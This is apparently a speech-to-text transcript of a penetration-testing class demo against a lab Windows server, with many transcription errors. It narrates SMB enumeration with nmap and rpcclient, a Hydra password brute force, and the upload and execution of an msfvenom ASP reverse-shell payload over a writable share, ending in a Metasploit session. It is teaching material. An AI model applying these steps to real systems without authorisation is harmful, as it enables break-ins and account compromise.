All right. So, if you weren't paying attention or in the power point now is the time to pay attention because I'm gonna go over all the tools we just learned about, about SMB um from the power point
So the first thing we're going to use against our target is and map
and you'll see you have a different terminal window, I'm using terminator.
There it is terminator.
Um what I like about this is you can split it vertically, you can split it horizontally.
You don't have to open new numerous terminal windows. I find myself opening many of them. That's not to say you can't
also split this horizontally
and vertically, but I kind of like the layout of terminator a little bit better.
So for now let's close these windows
and let's run end Map. So I'm gonna use end map against our target 1921681231
script is S N. B. A. New mall in um script. SMB. And um script on port 445 And we're making it very very very verbose.
And we can see here that it used SMB in um shares as the guest.
And we can see here if we have anonymous access. We don't to admin.
Um We don't to see we do have read and write access to I. P. C. Which
of course we can't look at files and directories but maybe we can use Eternal Blue the exploit if this is vulnerable to it.
We're not gonna do that though for right now.
Um users we can read
and I net public can read ultimately like we would be like to be able to write to a share.
So from here let's use RPC client and we'll use a knoll session so we're not going to um
put anything for the user is going to leave it blank.
And I'm just gonna hit enter here
and we can see where an RPc client
so we can do things like the question mark and we can see all the different options we have and we have a lot here.
So let's say for example we want to look at the server info. Maybe it will give us some info. Hopefully
we can see here we have a little bit of information
We can see the os version
What we can also do is look at our query users
our I. D. Relative identifier. And if we're paying attention before let me let me clear out this terminal.
Well it doesn't like that
In our PC client. We can do is query user 5000 because rid or I should say 500 because red 500 should be the administrator.
And we can see here that it is the administrator account.
So it we might be able to brute force the administrator. Let's try to see who a user is. So we're gonna query user 1000 which should be the first user on this machine.
So we see here that the first user is E user. And we might be able to brute force the login for I user.
So let's get out of this.
Now let's clear our screen
and let's try to brute force this ie user using hydra
and see what permissions we have.
So we'll see here hydra little L. Since we already know the users I. E. User, we could make a list of users that we enumerate with Big L. And and maybe a text file with all the different users. For Right now we're just using ie user
And I have a custom password list here. You might want to use something like rock you I can tell you that the password is in rock you for this user. It just takes over 40 minutes to find it.
And that sometimes the trouble with brute forcing logins
is it can take a very long time depending on what word lists you're using for either a user or a password combination.
Hopefully doesn't take 40 minutes.
that I user's password. Is this fancy password here?
So from here let's clear this out again
and let's use End Map. I want to show you the difference now that we have an actual user name and password.
Someone run End Map again. We're gonna do script SMB Anouma again. But we're using script arguments so I'm using SMB username, I user S and P password again, port 445 against this machine here.
And you just see it gave us a whole lot more information. SMB and new users. So it gave us all the different users
along with their relative identifiers here. So we found some of the users S S H. D. So this machine we enumerated it before and we found poor 22 open. So here there are ssh users.
We see also that we have read and write privileges to Inet Pub. Which is important because we learned that that's the web server. Right?
see that we knew sessions. So we're the only one logged in.
let's keep looking here
because this is really good information. SMB and um groups
So simply adding those arguments in the end map scripting engine
gave us a whole lot more information and gossip
like I said, enumeration is the key, right?
So now that we found this and we see that we can write to I net pub,
let's see if we can put something on that server
and just going to this web server here. We see this welcome page.
Now we'll talk about enumerating web servers a little bit later, but I told you guys to install things like WAP allies, er we can see the web framework is a sp dot net. It's a Windows server. It's using I. S 7.5. We also look at things like cookie values. We see a sp session I. D.
So it's definitely using Sp which if we're looking at shells
and S. P shell might be the right thing in this case.
Something to clear our terminal again.
now of course I could be splitting terminals for you vertically and horizontally, but I want to make it look clean for the demo. That's why I'm not doing that.
But let's use SMB client
You can go to the web root.
Now I always like to verify now I see a few, you know, hello? Dot A S P uh script here.
I just want to make sure that I can write to this directory.
you'll see that. That's right. We're in the web root here and then we can then try to write um or creating a shell with MSF venom.
We'll talk about shells later. But for now let's go ahead and split this vertically
and let's create a A S. P. Shell with MSF venom.
So see here MSF venom, our payload is Windows interpreter. Reverse TCP are listening. host is our machine because we're creating a reverse connection.
R. L. Port is 4444 and our format is a sp we're making a shelled out a sp script.
Okay, so we created that.
I'm going to move this.
To the desktop when I told you guys before the tilde is our current user, which is root
It's already here. Already created before, but I just like knowing where it is. Exactly.
so now what we're going to do is we're to launch this medicine plate framework, which we'll talk about a lot more later about shells but I'm going to execute the medicine plate framework
or executed module or create a module
within medicine play framework, exploit multi handler.
And here I'm just doing a whole bunch of things that I'm executing before I actually started up as opposed to starting up and having to enter each of these individually. Already know what I want to do.
So I'm using um exploit multi handler. I'm setting the payload as Windows interpreter, reverse TCP. And you'll notice it's the same things up above here with MSF venom.
So I wrote when I run this, gonna put in the background, that's why that tech jay.
and you'll see here or did everything for me. Right?
It's making it Windows interpreter, reverse TCP as our payload. RL host RL port.
Now what I want to do is put
mm You'll see you didn't like that.
So let's actually call the full path.
So we see that the full path, it likes that. And we can do D I R l s and we should see here that are shelled, A sp file is now in the Web root.
What should happen now? We can close this
is going to shell dot ESP.
we see that aim. Interpreter, session was opened
and if we go to sessions we should see that here it is.
And to interact with it, we just do sessions one,
you could use this info,
you drop into our shell
and we now have a shell on this Windows machine.
So that's looking at the various tools that we talked about in the power point or the lecture, I should say. Where we looked at End Map, we looked at rpc client, we looked at SMB client, but that's using all of those to enumerate this machine to ultimately get a shell on it.